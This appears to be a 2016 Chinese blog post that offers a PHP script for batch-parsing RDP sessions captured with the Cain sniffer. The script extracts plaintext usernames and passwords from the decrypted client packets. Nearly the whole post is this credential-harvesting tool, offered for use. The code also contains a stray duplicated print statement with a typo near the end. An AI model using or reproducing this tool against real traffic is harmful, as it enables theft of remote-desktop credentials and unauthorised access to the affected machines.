cain嗅探rdp文件批量解析

作者: admin 分类: 未分类 发布时间: 2016-03-06 04:40
<?php
//Author Wdot
//Site:http://wdot.cc
//用法 php CainRdpParser.php /tmp/1.txt        #单个文件解析
//用法 php CainRdpParser.php /tmp/RDP/        #批量解析
error_reporting(E_ERROR);
if(is_dir($argv[1]))
{
        foreach (scandir($argv[1]) as $key => $value) {
                if($value!='.' && $value!='..')
                {
                        rdpParser($argv[1].$value);
                }
        }
}elseif(is_file($argv[1]))
{
        rdpParser($argv[1]);
}

function rdpParser($filename){
        $crlf = "\r\n";
        if(!file_exists($filename)){
                print "file \"$filename\" not exists...$crlf";
                return;
        }
        $rdpH=fopen($filename,'r');
        print "FILE:".basename($filename).$crlf;
        fseek($rdpH,0);
        while (!feof($rdpH)) {
                $line=trim(fgets($rdpH));
                if(preg_match("/\w+.address:.*?$/",$line,$m))
                {
                        print $line.$crlf;
                }
                if(preg_match("/^\[Client decrypted packet\]/",$line,$m))
                {
                        $packet='';
                        while (!empty($line)) {
                                $line=trim(fgets($rdpH));
                                $packet.=substr($line,5,48);
                        }
                        $packets=explode('0000000000',str_replace(' ', '', $packet));
                        $i=count($packets)-27;
                        $packets=explode('0000',$packets[$i]);
                        $times=0;
                        foreach ($packets as $key => $value) {
                                if(empty($value) || $times>=2)continue;
//                                print (($times==0)?'username':'password').":\t".pack('H*',$value).$crlf;

	print(($times==0)?'username':'password').":\t".unicode_decode(pack('H*',$value)).$crlf;
                                $times++;
                                
                        }
                        break;
                }
        }
        fclose($rdpH);
        print "-------------------------------$crlf";
}
function unicode_decode($name)
{
        $name = strtolower($name);
        $pattern = '/([\w]+)|(\\\u([\w]{4}))/i';
        preg_match_all($pattern, $name, $matches);
        if (!empty($matches))
        {
            $name = '';
            for ($j = 0; $j < count($matches[0]); $j++)
            {
                $str = $matches[0][$j];
                if (strpos($str, '\\u') === 0)
                {
                    $code = base_convert(substr($str, 2, 2), 16, 10);
                    $code2 = base_convert(substr($str, 4), 16, 10);
                    $c = chr($code).chr($code2);
                    $c = iconv('UCS-2', 'UTF-8', $c);
                    $name .= $c;
                }
                else
                {
                    $name .= $str;
                }
            }
        }
        return $name;
}
	print(($times==0)?'username':'password').":\t".unicode_decode(pack('H*',$value)).$crf;
?>

发表评论

标签云